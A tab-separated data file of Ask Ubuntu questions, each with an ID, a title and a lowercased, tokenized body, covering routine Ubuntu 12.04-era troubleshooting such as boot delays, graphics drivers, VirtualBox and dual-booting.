190312	taking 10 minutes to boot up !	just added 2 pci-e to ide cards in my computer so i can use 2 old ide hard drives . everything works fine , except the os booting time has gone from about 10 seconds to about 10 minutes ... i'f i remove both cards , it takes about 10 seconds to boot up , if i add either 1 of the cards back in , it still takes 10 seconds to boot up , but as soon as i have both cards in , it takes about 10 minutes . why would this be happening ?
190324	what does the program cclive do ?	i run : $ cclive `` http : //www.youtube.com/watch ? v=nfltl1ybzpg '' and receive this error message : checking ... ... ... .. libquvi : error : /usr/share/quvi/lua/website/youtube.lua:117 : no match : fmt_url_map i run : $ cclive `` http : //www.youtube.com/watch ? v=0uufeqxyoda '' and receive this error message : checking ... ... ... . libquvi : error : /usr/share/quvi/lua/website/youtube.lua:117 : no match : fmt_url_map etc. , etc. , etc .
190326	can you run ubuntu on a tracfone lg800 ?	hey i was just wondering , can i could run ubuntu from a tracfone lg 800 ? it is an android phone , so i wanted to know before i buy it .
190328	problem installing from ubuntu 12.04.1 lts 32bit cd	older laptop currently running xp , only 128mb ram too . is 128 just too small ? but , 20+ gigs free hard drive and it 's been defragmented . when i try to install ubuntu from a cd i get the screen that says ubuntu and has the four red dots and then eventually goes blank and i just hear hard drive noises . stays this way indefinitely ( shut it off after half a day ) . burned another cd , at slow writing speed too , and dl is from ubuntu and get same result . any help much appreciated !
190329	playing age of empires ii multiplayer in virtualbox over wi fi network	i installed age of empires ii ( expansion ) in virtualbox ( hosting windows xp ) . it works great in single player mode . unfortunately , i tried playing multiplayer via wi-fi which i created on my ubuntu machine and ca n't seem to join games . but when i connected to my wi-fi router other able to connect to my system and we can play multiplayer mode this is what i 've done so far to try to resolve the issue : i noticed that the ip address of my virtual machine was 10.0.x.x , while the local ip on ubuntu is 192.168.x.x , which i figured was a problem . so i changed from nat networking to bridged networking in virtualbox . i turned off the windows firewall in the virtual machine and do n't have any ports blocked by ubuntu , so no software firewall should be at fault . however i 'm still unable to play multiplayer games , and suspect that some kind of networking issue lies at the heart of the problem . i 'm not sure what else i would need to change , however . so essentially i was wondering if anyone else here has managed to play aoe2 , or any similar game , inside virtualbox from ubuntu , and if so what you needed to do to make it possible . or if anyone has suggestions on where else to look to figure out the problem , i 'd appreciate that as well . unfortunately aoe2 itself does n't provide any debugging information to troubleshoot the inability to connect to network games . here my ip result both for ubuntu and virtualbox xp i want to play game on multiplayer mode in virtualbox on my system ( own created on ubuntu ) wi-fi on which other can connect and play hope someone will answer this
190330	how do i improve the performance of my virtualbox guest ?	i run a guest ubuntu 12.04 on a host ubuntu 12.04 , with virtualbox , and the guest is much , much slower than the host ( alt+tab takes 4-5 secs ) . i had a look around and i found contradicting opinions on virtualbox versus vmware ( free ) ; so i thought to keep the former . both systems are updated , i installed the additions on the guest and i evenly split memory and video memory ( 64mb ) between guest and host . i am running a toshiba m200 laptop with 4gb ram and shared video memory . the host bios does not include a configuration option for machine virtualization . i have 2 cpus and i ca n't give them both to the virtual machine . is there anything i overlooked that could solve my problem ? feel free to ask for more info , and thank you for any help . edit idling with the system monitor open the ( single ) guest cpu never gets below 55 % and could rise to 80 - 90 % just by moving the mouse around . opening firefox will cause the system monitor to show cpu usage 100 % in the guest , while the host shows that both cpus are evenly working around 60 % . my cpu is intel® core™2 duo cpu t5450 @ 1.66ghz × 2 . if this is not a configuration problem , does it mean my machine is too weak for virtualization ?
190334	how do i know if i am running wubi or a proper dual-boot ?	i tried to setup a `` proper '' windows/ubuntu dual-boot system , by installing ubuntu from a usb key . however , i simply could not get the laptop to boot off the usb despite the fact that i made the appropriate changes to the boot device order in the bios . so i then turned to wubi , and ( to cut a long story short ) it seems i now have a proper dual-boot setup , because i do n't need to launch ubuntu from windows . when i start the laptop , i get that screen that asks me whether i want to run windows or ubuntu . however , i 'm still not sure if this is a proper dual-boot setup , because when i run windows , it seems that my c : and d : drives are still the same size . if it was a proper dual boot i 'd expect separate partitions to have been created for ubuntu which would have removed some space from the c : and d : drive sizes displayed in windows . is there some way that i can confirm whether i 'm running a proper dual-boot , and if not , is there some process for converting a wubi installation to a proper dual-boot ?
190335	dell inspiron7520 and ubuntu 12.04 issues	i have a dell inspiron 7520 in the highest configuration : 3rd generation intel® core™ i7-3612qm processor ( 6m cache , up to 3.1 ghz ) 15.6 '' full high definition ( 1080p ) led display 8gb3 dual channel ddr3 sdram at 1600mhz 1tb 5400rpm sata hdd + 32gb msata ssd w/intel smart response blu-ray disc ( bd ) combo ( reads bd and writes to dvd/cd ) amd radeon™ hd 7730m 2gb 6.09 lbs and i have installed ubuntu 12.04 few days ago and i 'm facing some issues : 1 ) sometimes the whole ntb freezes and i have to hold power button for 5 secs to shut it down . i think it is something with vga and connected external monitor . i have read somewhere that it is already a reported bug , but what i am not sure about that it is doing sporadically . sometimes it freezes right after i log in , sometime i ran few hours and then it freezes . i am using those proprietary drivers but i was n't been able to install those with updates . 2 ) the next issue is the fan is quite noisy even when the ntb is almost idle . ( max 10 % cpu usage ) . can you recommend me some software which could do this power management to minimize the noise ? i have tried cpu frequency scaling indicator , but it seems that it has not any effects . 3 ) when i want to log out , restart or shutdown using the menu in upper right corner the upper and left trays disappear , but programs are still running and they wo n't close to complete log out or shutting down the os . when i use the cli command , it works fine . thanks for any help you can provide .
190340	is there a way to suspend without turning off network ?	this is a simple question . is there a way to set the network manager to not shut down when going in to suspend mode ?
190342	why does skype consume 100 % cpu ?	skype ( 4.0.0.4 ) consumes on my zenbook with 12.04 everytime i make a call 100 % cpu . does anybody know what to do ?
190343	how to have youtube-videos from the videos lens open in minitube	since the standard installed video-lens in 12.04 also covers youtube , the youtube-lens seems obsolete . however , the programme that connects the youtube lens with minitube ( scope-youtube ) does n't seem to connect the videos lens and minitube . is there any way to have those videos not opened in my browser but in minitube ?
190344	default program startup display	i have a dual display setup and would like to be able to set which display a piece of software starts on . most software seems to return to the last display but stellarium always starts in the primary display . does linux have a way of forcing the startup display or is it something the individual program has to manage ? thanks . edit and with no changes on my part stellarium is behaving nicely and remembering which screen it was on . still nice to know if there is a way of forcing this .
190346	does upgrading a kernel automatically enable trim ?	simple question , i have some servers that were running 10.04 that i upgraded to 12.04 . so they were installed using 10.04 ( kernel 2.6.32* i believe ) and the version of ext4 that shipped then . by upgrading to 12.04 and the newer kernel , does that enable trim automatically ? ( do i need to add 'discard ' to the fstab ? ) or do i need to do a clean install of 12.04 to get trim functionality on those drives .
190348	how to read a movie folder and output information from it	i am looking for a tool or group of tools that combined can read recursively from a folder and output the name of the folder , name of the movie file , resolution of movie and other info . for example , an output of it would be : ( 1997 ) titanic , titanicmovie , 1280x720 , 720p ( 2001 ) matrix 2 , matrix2 , 1280x1080 , 1080p ( 2012 ) titan , titanmovie , 1280x720 , 720p
190350	ca n't see youtube videos in either firefox or chromium	dont ' know why or if it is related , after upgrading ubuntu 10.04 kernel ( i guess from 2.6.32-38 to -42 ) i can 's see youtube videos . i checked the flash plug-ins installed and i have : ( 1 ) flashplugin-installer , ( 2 ) flashplugin-nonfree and ( 3 ) flashplugin-nonfree-extrasound . i have n't reinstalled the browsers yet . here 's the code of the plugins installed : williepabon @ raquel-desktop : ~ $ sudo lsb_release -a ; uname -a ; dpkg -l | egrep 'flash|gnash|swf|spark' [ sudo ] password for williepabon : no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid linux raquel-desktop 2.6.32-42-generic # 95-ubuntu smp wed jul 25 15:57:54 utc 2012 i686 gnu/linux ii flashplugin-installer 11.2.202.238ubuntu0.10.04.1 adobe flash player plugin installer ii flashplugin-nonfree 11.2.202.238ubuntu0.10.04.1 adobe flash player plugin installer ( transit ii flashplugin-nonfree-extrasound 0.0.svn2431-3 adobe flash player platform support library any ideas to solve this issue ? thanks . clarification : problem is with the flash plugin . chromium says `` missing plugin '' , firefox shows a blank screen where the video was suppose to appear . vimeo messages `` shockwave flash has crashed ''
190352	why does n't chromium show in unity launcher ?	when i open chromium , the icon does n't show up in the unity launcher like the other opened apps . why is this happening and what i can do to fix it ?
190359	keyboard layout issues using ubuntu 12.04 in ssh via x11 for mac	i just upgraded from 10.04 lts to 12.04 lts on my server ( dell intel xeon ) . by ssh login from my mac ( os x lion ) everything is fine ( no issues with command lines ) but when i open a window through x11 , the keyboard layout is now completely messed up . as an owner of a french mac keyboard , i got used to such issues and could deal by guessing the `` querty '' keys , but this time it 's worse . to fix it , i tried : 1/ sudo dpkg-reconfigure keyboard-configuration = > no effect 2/ sudo gnome-control-center then change the keyboard settings , however adding a couple of keyboard layouts did not change anything . i feel there is something to do with the x11 forwarding . any hints ? thanks
190362	is it possible to use ash window manager from chrome os ?	is it possible to use ash window manager from chrome os ? here is how it looks like : more info : http : //www.chromestory.com/2012/04/aura-and-ash-in-chrome-os-what-are-they/
190368	how to output avconv with pipe	i am trying to pipe an output from avconv to grep but somehow the pipe is not working correctly . the following ways are not working : avconv -i movie.mkv | grep something - which should show only the lines from the avconv that have something in them . avconv -i movie.mkv pipe : | grep something - which should show only the lines from the avconv that have something in them . avconv -i movie.mkv pipe:1 | grep something - which should show only the lines from the avconv that have something in them . how can i output the information from avconv to pipe ? why is it not working ? piping something like this works , but not the -i information parameter : avconv -codecs | grep `` 264 '' tested on 12.04 and 12.10
190369	a question about the admin password	i ca n't figure out my default admin password . until then , i wo n't be able to download apps etc . what is the default admin password ?
190371	problem loading 12.04 ubuntu ( running on low graphics mode please manually configure )	i 'm facing a problem in running ubuntu on my laptop ( i.e hp pavilion dm4- 1160us ) after installing the lastest os . your system is running in low-graphics mode , your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . i tried to update the grub by entering as i915.modeset xforcevesa but when i reboot i still get same error my system has intel hd graphics what do i do ?
190377	llvm-3.1 libllvmsupport.a undefined reference to `dladdr '	i 'm trying to compile using the llvm-3.1 package . i 'm running 12.04 x64 ( 3.2.0-26 kernel ) & & 12.10 ( 3.5.0-4 ) x64 backported llvm-3.1 from quantal , then debian experimental . next i tried 12.10 with the native ubuntu llvm-3.1 package ; this failed as well . user @ system : /tmp/llvm-test # make compiling cpp yacc file : decaf-llvm.y output file : decaf-llvm bison -b decaf-llvm -d decaf-llvm.y /bin/mv -f decaf-llvm.tab.c decaf-llvm.tab.cc flex -odecaf-llvm.lex.cc decaf-llvm.lex g++ -o ./decaf-llvm decaf-llvm.tab.cc decaf-llvm.lex.cc decaf-stdlib.c `llvm-config -- cppflags -- ldflags -- libs core jit native` -ly -ll /usr/lib/llvm-3.1/lib/libllvmsupport.a ( signals.o ) : in function `printstacktrace ( void* ) ' : ( .text+0x6c ) : undefined reference to `dladdr ' /usr/lib/llvm-3.1/lib/libllvmsupport.a ( signals.o ) : in function `printstacktrace ( void* ) ' : ( .text+0x18f ) : undefined reference to `dladdr ' collect2 : error : ld returned 1 exit status make : *** [ decaf-llvm ] error 1 i know the code works as i 've run it in centos fine using llvm-3.1-6.fc18 ( rpm ) google was a bit helpful with this : '' on some systems , incluning ubuntu 11.10 , linking may fail with message that libllvmsupport.a in function printstacktrace ( void* ) has undefined reference to dladdr . '' `` workaround is to compile llvm with cmake specifying the following variable : -dcmake_exe_linker_flags=-ldl '' http : //svn.dsource.org/projects/bindings/trunk/llvm-3.0/readme i double checked y ldflags and everything seems ok. user @ system : /llvm-config -- ldflags -l/usr/lib/llvm-3.1/lib -lpthread -lffi -ldl -lm i 'm unclear of what to do next ; any suggestions ?
190384	pitivi video editor ( gstreamer errors )	the error messages are not helpful in diagnosing what 's broken here : what can be done to make pitivi and gstreamer work better together ? should i just give up on pitivi and go with another tool ? error [ 15963 ] [ 0x7fb986aed700 ] `` < pipeline at 0x22333d0 > '' pipeline sep 18 19:31:14 _errorobject : error from /gstpipeline : pipeline1/gstbin : bin1/gnlcomposition : gnlcomposition3/gnlsource : gnlsource : audiotestsourcefactory3/gstbin : bin5/gstaudiotestsrc : real-audiotestsrc ( __main__.gstaudiotestsrc ) : gstreamer encountered a general stream error . ( gstbasesrc.c ( 2507 ) : gst_base_src_loop ( ) : /gstpipeline : pipeline1/gstbin : bin1/gnlcomposition : gnlcomposition3/gnlsource : gnlsource : audiotestsourcefactory3/gstbin : bin5/gstaudiotestsrc : real-audiotestsrc : streaming task paused , reason not-negotiated ( -4 ) ) ( /usr/lib/pitivi/python/pitivi/log/loggable.py:30 )
190387	ipheth notification at login prompt	on my command line only ubuntu machine , the login prompt occasionally shows a warning : ubuntu 12.04 lts myserver tty1 myserver login : [ 833747.589882 ] ipheth : ipheth_rcvbulk_callback : urb status : -71 nothing is obviously wrong with the system , and i can enter my username and password without issue . what does this message mean and should i be worried about it ? edit : i 've found plugging in and then removing my iphone from the computer causes this message . i 'm still looking for what it means .
190388	external drive hanging , load average through the roof	i have an external usb drive , and i run an hourly rsync to it as a backup . this has been working fine for years . this weekend , i got two new 2tb internal drives , and decided it was time to re-install ubuntu from scratch to clear out all the old cruft . about once a day since the re-install , the backup script hangs hard , usually in the `` rm -rf '' i do before the rsync . by the time i notice the problem , my load average is in the stratosphere and climbing fast ( one time , it was over 150 ) , but anything that does n't touch the drive seems to be running fine . one thing that i find suspicious is that something , i do n't know what , is doing a `` smartctl '' and a `` hdparm '' command on the usb drive . i 'm pretty sure smartctl is n't supposed to run on external drives . i ca n't figure out what 's doing it , either . here 's part of ps auwwfx when it 's hung : root 7310 0.0 0.0 4248 352 ? d 20:15 0:00 /sbin/hdparm -c /dev/sdd root 7808 0.0 0.0 17372 1632 ? d 20:15 0:00 /usr/sbin/smartctl -a -n standby -a -i /dev/sdd ( repeated every 5 minutes between the time the drive hung and now ) why is this happening , and how can i stop it ? update it turns out that it 's a munin plugin `` hddtemp_smartctl '' that 's doing those two commands , but they work most of the day and then suddenly they start hanging . so i 'm not closer to an answer . update i also found this in kern.log the last time it happened : sep 21 23:18:01 allhats2 kernel : [ 52652.707110 ] info : task kjournald:4380 blocked for more than 120 seconds . sep 21 23:18:01 allhats2 kernel : [ 52652.707113 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . sep 21 23:18:01 allhats2 kernel : [ 52652.707114 ] kjournald d ffffffff81806200 0 4380 2 0x00000000 sep 21 23:18:01 allhats2 kernel : [ 52652.707117 ] ffff8803661e1c10 0000000000000046 ffff8803fd890148 ffff880404f17000 sep 21 23:18:01 allhats2 kernel : [ 52652.707120 ] ffff8803661e1fd8 ffff8803661e1fd8 ffff8803661e1fd8 00000000000137c0 sep 21 23:18:01 allhats2 kernel : [ 52652.707122 ] ffff880404e89700 ffff880361304500 ffff8803661e1bf0 ffff88041f5d4080 sep 21 23:18:01 allhats2 kernel : [ 52652.707125 ] call trace : sep 21 23:18:01 allhats2 kernel : [ 52652.707130 ] [ < ffffffff811a8a40 > ] ? __wait_on_buffer+0x30/0x30 sep 21 23:18:01 allhats2 kernel : [ 52652.707133 ] [ < ffffffff8165850f > ] schedule+0x3f/0x60 sep 21 23:18:01 allhats2 kernel : [ 52652.707135 ] [ < ffffffff816585bf > ] io_schedule+0x8f/0xd0 sep 21 23:18:01 allhats2 kernel : [ 52652.707137 ] [ < ffffffff811a8a4e > ] sleep_on_buffer+0xe/0x20 sep 21 23:18:01 allhats2 kernel : [ 52652.707139 ] [ < ffffffff81658ddf > ] __wait_on_bit+0x5f/0x90 sep 21 23:18:01 allhats2 kernel : [ 52652.707140 ] [ < ffffffff811a8a40 > ] ? __wait_on_buffer+0x30/0x30 sep 21 23:18:01 allhats2 kernel : [ 52652.707142 ] [ < ffffffff81658e8c > ] out_of_line_wait_on_bit+0x7c/0x90 sep 21 23:18:01 allhats2 kernel : [ 52652.707145 ] [ < ffffffff8108ab20 > ] ? autoremove_wake_function+0x40/0x40 sep 21 23:18:01 allhats2 kernel : [ 52652.707146 ] [ < ffffffff811a8a3e > ] __wait_on_buffer+0x2e/0x30 sep 21 23:18:01 allhats2 kernel : [ 52652.707149 ] [ < ffffffff81257534 > ] journal_commit_transaction+0x484/0xfc0 sep 21 23:18:01 allhats2 kernel : [ 52652.707152 ] [ < ffffffff8125b5eb > ] kjournald+0xeb/0x250 sep 21 23:18:01 allhats2 kernel : [ 52652.707154 ] [ < ffffffff8108aae0 > ] ? add_wait_queue+0x60/0x60 sep 21 23:18:01 allhats2 kernel : [ 52652.707155 ] [ < ffffffff8125b500 > ] ? commit_timeout+0x10/0x10 sep 21 23:18:01 allhats2 kernel : [ 52652.707157 ] [ < ffffffff8108a03c > ] kthread+0x8c/0xa0 sep 21 23:18:01 allhats2 kernel : [ 52652.707160 ] [ < ffffffff81664b74 > ] kernel_thread_helper+0x4/0x10 sep 21 23:18:01 allhats2 kernel : [ 52652.707162 ] [ < ffffffff81089fb0 > ] ? flush_kthread_worker+0xa0/0xa0 sep 21 23:18:01 allhats2 kernel : [ 52652.707163 ] [ < ffffffff81664b70 > ] ? gs_change+0x13/0x13
190390	nvidia error `` fallen off the bus ''	i have been having a serious issue with my lg notebook and its nvidia geforce 310m gpu . it usualy ( 99 % of the time ) happens when i leave the computer idle for a while , but it has also happened sometimes while i was using the pc . suddenly , ( usualy when computer is idle ) the screen goes black , and the pc freezes completely on the black screen . ( not even ping responses ) . the only sollution is to hard reset the machine . when analizing the syslog , i see the following error : sep 18 20:58:08 yuri-notebook kernel : [ 1936.510073 ] nvrm : gpu at 0000:01:00.0 has fallen off the bus . sep 18 20:58:08 yuri-notebook kernel : [ 1936.510087 ] nvrm : gpu at 0000:01:00.0 has fallen off the bus . sep 18 20:58:08 yuri-notebook kernel : [ 1936.510157 ] delay : estimated 354 , actual 1 sep 18 20:58:08 yuri-notebook kernel : [ 1936.510173 ] delay : estimated 353 , actual 0 i have already tryed different versions of the nvidia drivers , and also tryed removing each of my 2 ddr3 memories . the problem does not seem to be hardware , because when i boot into windows 7 , it works normaly , for days . i am desperate with this problem , because it makes my ubuntu practicaly unusable . thanks in advance , yuri
190391	dual screens not working nvidia	i just install ubuntu to my p.c . i started it up with both my screens plugged into my nvidia 's dvi and vga ports and logged in , change the skin to classic gnome , because that 's how it was when i last used ubuntu ( 8.1 ) , and both screens were working separately . the trouble is that i got a notification saying there was nvidia drivers to be installed , so i install them and restart my p.c. , and when i get back on only one of my screens is working and when i go into displays ( all settings , displays ) it does n't register my other screen at all . it calls my working screen `` laptop '' . i 've tried looking through several pages of google but i see no answer . i did try to find the nvidia-settings to see if that had the answers but sadly i could n't locate it .
190392	mythbuntu 12 - lirc device does n't appear to even exist	i 'm trying to get a new installation of mythbuntu working . so far , everything is ok except the remote . the sensor for the remote is on my hauppauge wintv hvr 1250 . first i tried to run irw to see what was being picked up by the sensor : $ irw connect : no such file or directory then trying to run lircd gives : $ lircd start $ lircd start lircd : ca n't open or create /var/run/lirc/lircd.pid i look for any lirc devices and find there are none : $ ls /dev/li* ls : can not access /dev/li* : no such file or directory just to be sure , i check in /proc/bus/input/devices , which shows me two powerbuttons ( not sure why ) , kbd and mouse dev , and the audio devs . nothing for the ir receiver on the tuner card ( which i thought was strange because should n't the tuner show up here ? ) . $ cat /proc/bus/input/devices i : bus=0019 vendor=0000 product=0001 version=0000 n : name= '' power button '' p : phys=pnp0c0c/button/input0 s : sysfs=/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0 u : uniq= h : handlers=kbd event0 b : prop=0 b : ev=3 b : key=10000000000000 0 i : bus=0019 vendor=0000 product=0001 version=0000 n : name= '' power button '' p : phys=lnxpwrbn/button/input0 s : sysfs=/devices/lnxsystm:00/lnxpwrbn:00/input/input1 u : uniq= h : handlers=kbd event1 b : prop=0 b : ev=3 b : key=10000000000000 0 i : bus=0003 vendor=099a product=7202 version=0111 n : name= '' wireless keyboard/mouse '' p : phys=usb-0000:00:10.1-2/input0 s : sysfs=/devices/pci0000:00/0000:00:10.1/usb8/8-2/8-2:1.0/input/input2 u : uniq= h : handlers=sysrq kbd event2 b : prop=0 b : ev=120013 b : key=1000000000007 ff9f207ac14057ff febeffdfffefffff fffffffffffffffe b : msc=10 b : led=7 i : bus=0003 vendor=099a product=7202 version=0111 n : name= '' wireless keyboard/mouse '' p : phys=usb-0000:00:10.1-2/input1 s : sysfs=/devices/pci0000:00/0000:00:10.1/usb8/8-2/8-2:1.1/input/input3 u : uniq= h : handlers=kbd mouse0 event3 b : prop=0 b : ev=1f b : key=4837fff072ff32d bf54444600000000 70001 20c100b17c000 267bfad9415fed 9e168000004400 10000002 b : rel=143 b : abs=100000000 b : msc=10 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hd-audio generic line '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:14.2/sound/card0/input4 u : uniq= h : handlers=event4 b : prop=0 b : ev=21 b : sw=2000 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hd-audio generic front mic '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:14.2/sound/card0/input5 u : uniq= h : handlers=event5 b : prop=0 b : ev=21 b : sw=10 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hd-audio generic rear mic '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:14.2/sound/card0/input6 u : uniq= h : handlers=event6 b : prop=0 b : ev=21 b : sw=10 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hd-audio generic front headphone '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:14.2/sound/card0/input7 u : uniq= h : handlers=event7 b : prop=0 b : ev=21 b : sw=4 i : bus=0000 vendor=0000 product=0000 version=0000 n : name= '' hd-audio generic line-out '' p : phys=alsa s : sysfs=/devices/pci0000:00/0000:00:14.2/sound/card0/input8 u : uniq= h : handlers=event8 b : prop=0 b : ev=21 b : sw=40 according to dmesg , the driver was registered , but it does n't look like any devices was associated with the driver : $ dmesg | grep irc [ 10.631162 ] lirc_dev : ir remote control driver registered , major 249 so far , i 've seen a number of forum pages suggesting that i use some trick to create a link between /dev/lirc and some other device that is the real ir sensor , like /dev/event5 , but those cases assume that the real device is shown from /proc/bus/input/devices , and i do n't see any such device there . any suggestions on how to fix or further diagnose this ? fwiw , it seems like this question describes a similar problem , but has no solution yet : tracing ir to hauppage remote on mythbuntu 12.04
190396	software center does n't ask for a password anymore	so , out of the blue , software-center stopped asking me for a password . it just runs , and then turns grey . works fine as root , or with sudo . while investigating , i found out about polkit ( new to me ) , and looked at the policies , which seem fine . looking under localauthority , however , showed that while the sub-directories ( 10- , 20- , 30- , 50- , 90- ) are there , there are n't any files under those . is that my problem ? should there be a file in the 50-local.d ? or am i still looking in the wrong place for my problem ? i looked for similar questions and looked at the answers , but they do n't really help any . one other thing , i 'm not sure it 's related but seemed to happen about the same time : the dash home only shows items for recent files and downloads . nothing anywhere else anymore . update : fixed the software-center problem by following this post : software center not opening dash home problem still exists . must be something else ... another update : fixed the dash home by doing a unity -- reset that i found here : unity dash completely empty all of a sudden . howto fix ?
190404	changed username . now i can not log on or view my previous files	i want to change my username and followed the instructions from how do i change my username ? by creating a temp user with admin privileges . while logged in as temp , i did : sudo usermod -l newname oldname sudo usermod -d /home/newname -m newname now i can not log in under newname and /home only lists newname and temp reading through other sites now , it seems i should have used usermod -d /home/newname -m oldname based on this , i think i may have deleted the contents of my previous home folder ? ? i 'm sure i 'm not the first person to do some stupid while changing username , but any help is greatly appreciated . thank you !
190405	how can i properly add playonlinux programs to the unity launcher ?	i have a playonlinux app ( evernote ) that runs great , but i would like to pin it to the unity launcher . i already have a shortcut in the dash and i can pin that to the launcher , but then running it results in the app showing a wine icon in the launcher and not the icon that the shortcut had . the shortcut i have is a playonlinux created shortcut and the command is : /usr/share/playonlinux/playonlinux -- run `` evernote '' i read elsewhere that in order to properly pin a wine app to the unity launcher the command has to look like this : env wineprefix= '' /home/myname/.playonlinux/wineprefix/wine1.4_en4.5 '' wine 'c : \\program files\\evernote\\evernote\\evernote.exe' this works great in terms of launching and having unity use the right icon on the launcher , but this fails because the `` wine '' i am running is not the pol 1.4 , but rather the system installed version . playing around with the wineloader environment variable did not help . note : this question is not a duplicate of how can i add playonlinux programs in the unity dash ? as i already have the launcher shortcut in the dash .
190406	can org.freedesktop.notifications.closenotification ( uint id ) be triggered and invoked via dbus ?	ref : close button on notify-osd ? bookmark : can org.freedesktop.notifications.closenotification ( uint id ) be triggered and invoked via dbus ? currently , this script dbus-monitor `` interface='org.freedesktop.notifications ' '' | \ grep -- line-buffered `` member=notify '' | \ sed -u -e 's/ . */killall notify-osd/g ' | \ bash will kill all pending notifications . it would be better to finesse the specific target osd notification to cancel , by using org.freedesktop.notifications.closenotification ( uint id ) . is there an interface method that can put this on ( in ? ) the dbus to fire when a particular notify event occurs ? the method will need to get the notify pid to use as the argument for closenotification ( uint id ) . alternatively , qdbus org.freedesktop.notifications \ /org/freedesktop/notifications \ org.freedesktop.notifications.closenotification ( uint id ) could be used from the shell , if the ( uint id ) argument could be determined . the actual command syntax would use an integer in place of ( uint id ) . perhaps a better question to ask first might be `` how is a notification 's dbus address found ? '' . neither of these identify it correctly : gdbus monitor -- session -- dest org.freedesktop.notifications returns the name org.freedesktop.notifications is owned by :1.130 ... or dbus-monitor `` interface='org.freedesktop.notifications ' '' returns ... string `` :1.340 '' ... in hindsight , the previous question `` how is the ( uint id ) for a notification found ? `` is rhe torical given this previous answer to another question : http : //askubuntu.com/a/186311/89468 provides details so either method below can be used : gdbus call -- session -- dest org.freedesktop.dbus \ -- object-path / \ -- method org.freedesktop.dbus.getconnectionunixprocessid :1.16 returning : ( uint32 8957 , ) or qdbus -- literal -- session org.freedesktop.dbus \ / \ org.freedesktop.dbus.getconnectionunixprocessid :1.16 returning : 8957 the pop-up notify-osd graffit would be then defeated with : qdbus org.freedesktop.notifications \ /org/freedesktop/notifications \ org.freedesktop.notifications.closenotification \ $ ( qdbus -- literal -- session \ org.freedesktop.dbus \ / \ org.freedesktop.dbus.getconnectionunixprocessid : ? . ? ? ? ) the `` trick '' is to find the : ? . ? ? ? dbus address .
190407	installing ubuntu on windows	in win xp firefox , google chrome and ie crash very often ( due to some virus or something else ) . my friend suggested i should install ubuntu operating system ( as it is unaffected by most viruses ) . now my question is if i install ubuntu along with windows on the same hard disk - will it slow my computer even more because 2 operating systems are in the computer..or will it solve my problem . also should i install ubuntu 10.04 or ubuntu 12.04 system specs amd sempron processor 2.21 ghz 790 mb of ram
190412	tried to remove lamp-server , now my x wo n't work	i did this command to install : sudo apt-get install lamp-server^ i did this one to uninstall : sudo apt-get remove lamp-server^ it uninstalled a lot of things , and now my system wo n't go to x. i tried sudo apt-get install ubuntu-desktop , and it made possible to start x in other screen , but without gnome or unity . how do i recover my desktop ?
190425	how to install internet explorer ( multiple versions ) ?	i am developing one site which has chat feature in rails . i am using ubuntu 12.04 lts . i need to check that the site is ie9 because the chat feature using socket io of html5 . i want to know that how to install ie9 in ubuntu . i have looked at chrome and firefox extensions but if any standalone is available then please give me suggestion .
190426	ubuntu is okay - old vista is still not loading after boot-repair	i have cleaned an old ubuntu - that caused my grub loader to go crap . i have managed to put a new ubuntu instead of that - but my vista is stil unaccessible . i have made boot-repair to run ( but maybe my settings did not worked ) . i have checked later the mbr record correction too . can anybody chat with me or can i share my screen ? csaba
190430	accessing network shares	i 'm looking for some help on how to connect and mount network shares on my current install of 12.04 . the fileserver shares that i 'm trying to access are on a solaris 11 system using zfs . just wondering what i need to change/add to the fstab in order to be able to access them ? i can access them fine from windows by just mapping them as \hostname\sharename . am i missing something or do i have to install an extra packages ?
190432	error `` could not update iceauthority file '' while using the vmware	i 'm running ubuntu 12.04 on the vmware player . however , all of a sudden i got the error `` could not update iceauthority file '' when i tried to boot . i tried looking up a load of solutions but all of those involved getting into the command line while booting , but i ca n't get into the command line in the virtual machine . any help would be appreciated .
190433	ubuntu one extremely slow with a `` file sync in progress '' message	i 've asked this before , but have n't got any answer is it that u1 on windows is waaaay too slow , or is it just a glitch that the screen keeps saying `` file sync in progress '' after a long while ? i have coordinated batch jobs that sync some files at midnight , and dropbox takes only 5 minutes , but u1 takes more than 2 hours to do the same job ? is it the current status ? or is just a screen bug that keeps the label `` file sync is in progress '' for a really long time ?
190434	window buttons on cinnamon top panel	is it possible put the window buttons on the top panel of cinnamon like in unity ?
190436	what is a block device ?	i am creating dual-boot system with windows 7 and ubuntu . i want to check windows 7 installation block device . what is block device ? how to distinguish the windows 7 installation block device from ubuntu ? how can we make secure that the windows block device can not be deleted by root user ?
190438	formatting c : / in windows while ubuntu is installed in d : /	i had installed ubuntu 11.10 through wubi installer in windows vista in d : \ a few months ago . i am able to dual boot to anyone os . but , now i have a problem with the windows so i want to format my c : \ drive . will the current installation of ubuntu will change on my pc . that is would the ubuntu will automatically removed from my pc or it would be there for dual boot even after the format ?
190440	system-config-lvm will be removed if i install playonlinux ?	when i try to install playonlinux , i am told ( by synaptic , as well as the `` software center '' ) that system-config-lvm will be removed , does anyone know why ?
190441	rdesktop is not accepting a 3 key combination	so i 'm using rdesktop to connect to a remote server of us where i have visual studio . the virtual machine is a windows 2008 server . i use this parameters : rdesktop -d -g 1920x1200 -k it x.x.x.x because i have an italian keyboard . i have no problem writing , the keys are in place . when i try to type { or } i have problems because with the italian keyboard i have this combination : l-shift+altgr+ ( ă¨|+ ) and it 's not working do you have a solution by any chance ?
